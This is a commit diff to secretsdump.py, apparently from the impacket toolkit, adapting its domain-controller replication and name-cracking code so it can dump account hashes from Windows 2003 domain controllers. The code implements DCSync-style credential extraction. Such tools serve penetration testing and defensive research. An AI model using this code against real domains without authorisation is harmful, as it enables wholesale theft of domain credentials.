Updated secretsdump.py code for Windows 2003 DC support

main
byt3bl33d3r 2015-08-26 13:44:10 +02:00
parent 258a76b054
commit dcfa80ba5b
1 changed files with 15 additions and 4 deletions

View File

@ -621,10 +621,10 @@ class RemoteOperations:
request['pmsgIn']['V8']['pUpToDateVecDest'] = NULL request['pmsgIn']['V8']['pUpToDateVecDest'] = NULL
request['pmsgIn']['V8']['ulFlags'] = drsuapi.DRS_INIT_SYNC | drsuapi.DRS_PER_SYNC request['pmsgIn']['V8']['ulFlags'] = drsuapi.DRS_INIT_SYNC | drsuapi.DRS_WRIT_REP
request['pmsgIn']['V8']['cMaxObjects'] = 1 request['pmsgIn']['V8']['cMaxObjects'] = 1
request['pmsgIn']['V8']['cMaxBytes'] = 0 request['pmsgIn']['V8']['cMaxBytes'] = 0
request['pmsgIn']['V8']['ulExtendedOp'] = drsuapi.EXOP_REPL_OBJ | drsuapi.EXOP_REPL_SECRETS request['pmsgIn']['V8']['ulExtendedOp'] = drsuapi.EXOP_REPL_OBJ
request['pmsgIn']['V8']['pPartialAttrSet'] = NULL request['pmsgIn']['V8']['pPartialAttrSet'] = NULL
request['pmsgIn']['V8']['pPartialAttrSetEx1'] = NULL request['pmsgIn']['V8']['pPartialAttrSetEx1'] = NULL
request['pmsgIn']['V8']['PrefixTableDest']['pPrefixEntry'] = NULL request['pmsgIn']['V8']['PrefixTableDest']['pPrefixEntry'] = NULL
@ -648,6 +648,12 @@ class RemoteOperations:
resp = e.get_packet() resp = e.get_packet()
return resp return resp
def ridToSid(self, rid):
if self.__samr is None:
self.connectSamr(self.getMachineNameAndDomain()[1])
resp = samr.hSamrRidToSid(self.__samr, self.__domainHandle , rid)
return resp['Sid']
def getMachineNameAndDomain(self): def getMachineNameAndDomain(self):
if self.__smbConnection.getServerName() == '': if self.__smbConnection.getServerName() == '':
# No serverName.. this is either because we're doing Kerberos # No serverName.. this is either because we're doing Kerberos
@ -1402,8 +1408,13 @@ class NTDSHashes:
for user in resp['Buffer']['Buffer']: for user in resp['Buffer']['Buffer']:
userName = user['Name'] userName = user['Name']
# Let's crack the user name into DS_FQDN_1779_NAME userSid = self.__remoteOps.ridToSid(user['RelativeId'])
crackedName = self.__remoteOps.DRSCrackNames(drsuapi.DS_NT4_ACCOUNT_NAME_SANS_DOMAIN, name = userName)
# Let's crack the user sid into DS_FQDN_1779_NAME
# In theory I shouldn't need to crack the sid. Instead
# I could use it when calling DRSGetNCChanges inside the DSNAME parameter.
# For some reason tho, I get ERROR_DS_DRA_BAD_DN when doing so.
crackedName = self.__remoteOps.DRSCrackNames(drsuapi.DS_NAME_FORMAT.DS_SID_OR_SID_HISTORY_NAME, drsuapi.DS_NAME_FORMAT.DS_FQDN_1779_NAME, name = userSid.formatCanonical())
if crackedName['pmsgOut']['V1']['pResult']['cItems'] == 1: if crackedName['pmsgOut']['V1']['pResult']['cItems'] == 1:
userRecord = self.__remoteOps.DRSGetNCChanges(crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['pName'][:-1]) userRecord = self.__remoteOps.DRSGetNCChanges(crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['pName'][:-1])